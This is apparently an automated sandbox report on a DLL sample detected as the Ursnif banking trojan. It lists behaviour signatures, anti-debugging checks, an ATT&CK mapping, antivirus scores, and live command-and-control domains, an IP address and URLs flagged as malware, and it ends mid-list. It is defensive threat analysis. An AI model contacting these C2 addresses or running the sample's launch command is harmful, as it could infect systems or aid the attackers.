Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: HP7cjYBnlS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HP7cjYBnlS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HP7cjYBnlS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HP7cjYBnlS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HP7cjYBnlS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HP7cjYBnlS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: HP7cjYBnlS.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: HP7cjYBnlS.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: HP7cjYBnlS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HP7cjYBnlS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HP7cjYBnlS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HP7cjYBnlS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HP7cjYBnlS.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1B1F7C LoadLibraryA,GetProcAddress,

1_2_6E1B1F7C

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B2200 push ecx; ret	1_2_6E1B2209
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B2253 push ecx; ret	1_2_6E1B2263
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E282E55 push esi; ret	1_2_6E282E5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03087DCF push ecx; ret	4_2_03087DDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03087A60 push ecx; ret	4_2_03087A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E282E55 push esi; ret	4_2_6E282E5E

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.375144383.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456094378.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375123704.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375061576.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.473815277.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456111628.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375035453.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456029858.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375085386.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456137723.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476067221.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375104521.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456077100.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375160465.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456001052.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375172121.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456056228.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.455955678.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5564, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DBE2B FindFirstFileExW,FindNextFileW,FindClose,	1_2_6E1DBE2B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DBA6F FindFirstFileExW,	1_2_6E1DBA6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DBE2B FindFirstFileExW,FindNextFileW,FindClose,	4_2_6E1DBE2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DBA6F FindFirstFileExW,	4_2_6E1DBA6F

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1D520E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6E1D520E

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1B1F7C LoadLibraryA,GetProcAddress,

1_2_6E1B1F7C

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DB429 mov eax, dword ptr fs:[00000030h]	1_2_6E1DB429
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DB21D mov eax, dword ptr fs:[00000030h]	1_2_6E1DB21D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DB260 mov eax, dword ptr fs:[00000030h]	1_2_6E1DB260
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DB2BB mov eax, dword ptr fs:[00000030h]	1_2_6E1DB2BB
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DB370 mov eax, dword ptr fs:[00000030h]	1_2_6E1DB370
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DB3B4 mov eax, dword ptr fs:[00000030h]	1_2_6E1DB3B4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DB3F8 mov eax, dword ptr fs:[00000030h]	1_2_6E1DB3F8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1CB0D0 mov eax, dword ptr fs:[00000030h]	1_2_6E1CB0D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1CB112 mov ecx, dword ptr fs:[00000030h]	1_2_6E1CB112
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1DB1DA mov eax, dword ptr fs:[00000030h]	1_2_6E1DB1DA
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E280A6A mov eax, dword ptr fs:[00000030h]	1_2_6E280A6A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E2809A0 mov eax, dword ptr fs:[00000030h]	1_2_6E2809A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E2805A7 push dword ptr fs:[00000030h]	1_2_6E2805A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DB429 mov eax, dword ptr fs:[00000030h]	4_2_6E1DB429
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DB21D mov eax, dword ptr fs:[00000030h]	4_2_6E1DB21D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DB260 mov eax, dword ptr fs:[00000030h]	4_2_6E1DB260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DB2BB mov eax, dword ptr fs:[00000030h]	4_2_6E1DB2BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DB370 mov eax, dword ptr fs:[00000030h]	4_2_6E1DB370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DB3B4 mov eax, dword ptr fs:[00000030h]	4_2_6E1DB3B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DB3F8 mov eax, dword ptr fs:[00000030h]	4_2_6E1DB3F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1CB0D0 mov eax, dword ptr fs:[00000030h]	4_2_6E1CB0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1DB1DA mov eax, dword ptr fs:[00000030h]	4_2_6E1DB1DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E280A6A mov eax, dword ptr fs:[00000030h]	4_2_6E280A6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2809A0 mov eax, dword ptr fs:[00000030h]	4_2_6E2809A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2805A7 push dword ptr fs:[00000030h]	4_2_6E2805A7

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1DED89 GetProcessHeap,

1_2_6E1DED89

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1D520E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		1_2_6E1D520E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1D520E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_6E1D520E

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\HP7cjYBnlS.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.472113602.00000000018F0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.473066797.0000000003860000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.472113602.00000000018F0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.473066797.0000000003860000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.472113602.00000000018F0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.473066797.0000000003860000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.472113602.00000000018F0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.473066797.0000000003860000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_03084454 cpuid

4_2_03084454

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	1_2_6E1B1E8A
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6E1DDE5B
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6E1DDE84
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6E1E4C9D
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6E1E4D06
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6E1DDD84
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6E1E4DA1
Source: C:\Windows\System32\loaddll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_6E1E49FB
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	1_2_6E1DE7A7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_6E1E537A
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_6E1E51A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6E1DE7A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6E1E4C9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6E1E4D06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6E1DDD84
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6E1E4DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_6E1E537A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_6E1E51A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_6E1E49FB

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1B1144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_6E1B1144

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_03084454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

4_2_03084454

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E1B1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_6E1B1F10

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.375144383.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456094378.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375123704.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375061576.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.473815277.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456111628.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375035453.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456029858.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375085386.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456137723.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476067221.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375104521.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456077100.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375160465.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456001052.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375172121.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456056228.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.455955678.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5564, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.375144383.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456094378.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375123704.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375061576.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.473815277.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456111628.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375035453.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456029858.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375085386.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456137723.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.476067221.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375104521.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456077100.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375160465.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456001052.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.375172121.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.456056228.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.455955678.0000000005BB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5564, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
HP7cjYBnlS.dll	6%	Virustotal		Browse
HP7cjYBnlS.dll	2%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.3080000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
1.2.loaddll32.exe.f00000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Label	Link
authd.feronok.com	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://authd.feronok.com/5FNMYYgHAZL8fVyyU/16CafLRrMTz3/QRf0T9yKnnG/48zYuAResxRN4Y/8IsjuLfvxqx5QmY_2	100%	Avira URL Cloud	malware
http://authd.feronok.com/ft4uMX2U8DExkako/7nz7XYcy_2FPVr_/2FPwc_2Fs5FKMespD3/eoY8gKUtH/5APsBMu_2FYgV7VnT01F/UNasB5xyXVRAz2U9YlK/vPhVaOevuoWXkOwOuvQxwX/WzTW2Vxlbm5Dm/rPytLuLu/KL_2FHSOlQc2K_2BpO7JML7/v1pC4egQVv/iWGaiNgaqJFCdjHoy/PoXO84M5LLuy/jOUqBl_2Bse/EY7p0c9R6kAidR/RKeKXozKr_2B2DMk4uhLx/44Gh2U87rhzhq5q8/e3uXzWyPgLhp7zv/L1Iu0qPLA6WpCvBUhY/ZBphUq1tO/a9IY_2Fv/fGT	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
authd.feronok.com	47.254.173.212	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://authd.feronok.com/ft4uMX2U8DExkako/7nz7XYcy_2FPVr_/2FPwc_2Fs5FKMespD3/eoY8gKUtH/5APsBMu_2FYgV7VnT01F/UNasB5xyXVRAz2U9YlK/vPhVaOevuoWXkOwOuvQxwX/WzTW2Vxlbm5Dm/rPytLuLu/KL_2FHSOlQc2K_2BpO7JML7/v1pC4egQVv/iWGaiNgaqJFCdjHoy/PoXO84M5LLuy/jOUqBl_2Bse/EY7p0c9R6kAidR/RKeKXozKr_2B2DMk4uhLx/44Gh2U87rhzhq5q8/e3uXzWyPgLhp7zv/L1Iu0qPLA6WpCvBUhY/ZBphUq1tO/a9IY_2Fv/fGT	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.wikipedia.com/	msapplication.xml6.23.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.23.dr	false		high
http://www.nytimes.com/	msapplication.xml3.23.dr	false		high
http://www.live.com/	msapplication.xml2.23.dr	false		high
http://authd.feronok.com/5FNMYYgHAZL8fVyyU/16CafLRrMTz3/QRf0T9yKnnG/48zYuAResxRN4Y/8IsjuLfvxqx5QmY_2	{09EF2733-C841-11EB-90E4-ECF4BB862DED}.dat.23.dr	true	Avira URL Cloud: malware	unknown
http://www.reddit.com/	msapplication.xml4.23.dr	false		high
http://www.twitter.com/	msapplication.xml5.23.dr	false		high
http://www.youtube.com/	msapplication.xml7.23.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.254.173.212	authd.feronok.com	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	430819
Start date:	08.06.2021
Start time:	03:03:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	HP7cjYBnlS (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.winDLL@12/22@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.1% (good quality ratio 7.7%) Quality average: 79.2% Quality standard deviation: 29.1%
HCA Information:	Successful, ratio: 64% Number of executed functions: 47 Number of non-executed functions: 127
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 52.147.198.201, 52.255.188.83, 104.43.193.48, 23.218.208.56, 13.107.4.50, 2.20.142.210, 2.20.142.209, 40.88.32.150, 13.64.90.137, 20.190.160.68, 20.190.160.7, 20.190.160.130, 20.190.160.1, 20.190.160.9, 20.190.160.74, 20.190.160.72, 20.190.160.5, 104.42.151.234, 20.50.102.62, 88.221.62.148, 20.54.26.129, 20.82.209.104, 152.199.19.161 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e11290.dspg.akamaiedge.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, login.live.com, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, afdap.au.au-msedge.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, 